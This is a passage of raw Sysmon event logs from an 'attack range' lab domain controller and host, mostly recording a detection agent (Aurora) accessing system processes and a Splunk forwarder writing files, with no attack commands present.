AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5876B582F088609817AAAFC4BA91FEA3,SHA256=15520179FD8C9A7DAA6384DD3164895BF757B3F480676F7C44E441259EFDCD90,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.885{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.874{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.870{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.861{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.860{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.859{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.859{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.841{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.818{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.810{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.800{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046215Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046214Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.794{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046213Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.792{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046212Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046211Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046210Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046209Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.782{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046208Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.781{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046207Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.780{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046206Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.779{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046205Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046204Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.268{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000046203Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:14.266{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 354300x800000000000000046202Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:11.579{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56457-false10.0.1.12-8000- 23542300x800000000000000018454Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:15.493{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64D3CD1ADFFA247DF1780F798DDC82B9,SHA256=680EB12A49F0A48050EFF2E789CA3E4EAD00E95C8DE68B16F547FD12DA6AC4A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018456Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:16.569{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC94E01D7F2B5C1E3652AA933167344F,SHA256=420EC2843363C1B00025C82348DC1416DAF0C43C091073D2EC70C52DDBE5C9B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:16.288{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=D972C27FD28F1554923969C7EA25E8CD,SHA256=3189B0A69D9EC7ED403E333D86A624C0B22EB2D04A4F8B61D4E9C151C8D3ECB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:16.054{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C197302E0219788B99A9B23E22CA126,SHA256=568C458FB92C8DDAD15350EBB4DDE21937A95FC43994DDADD5EDBB9037DA438D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018455Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:16.489{E5A8D418-DC43-63C7-1200-00000000B002}1012NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=D485C9F1A663D5DC6A0ECC0E6265D702,SHA256=1F72F3732761EC5148328A417A7DA23620D020DF063DC674C8DEEBB6B0B9D316,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018457Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:17.655{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72B3F8266601CE078163404B055EC60F,SHA256=11E0FA166D17B5E06A3D8FB860B9C8604B0253E98E7969BCDBBB0DBC7A85E1C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:17.134{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1859B33402202804F66238F5F1920982,SHA256=40CE99541A0BD26CDF5658457AF9D471646CA0BB1B3A8619A5529CD8A9F9775C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018459Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:18.724{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 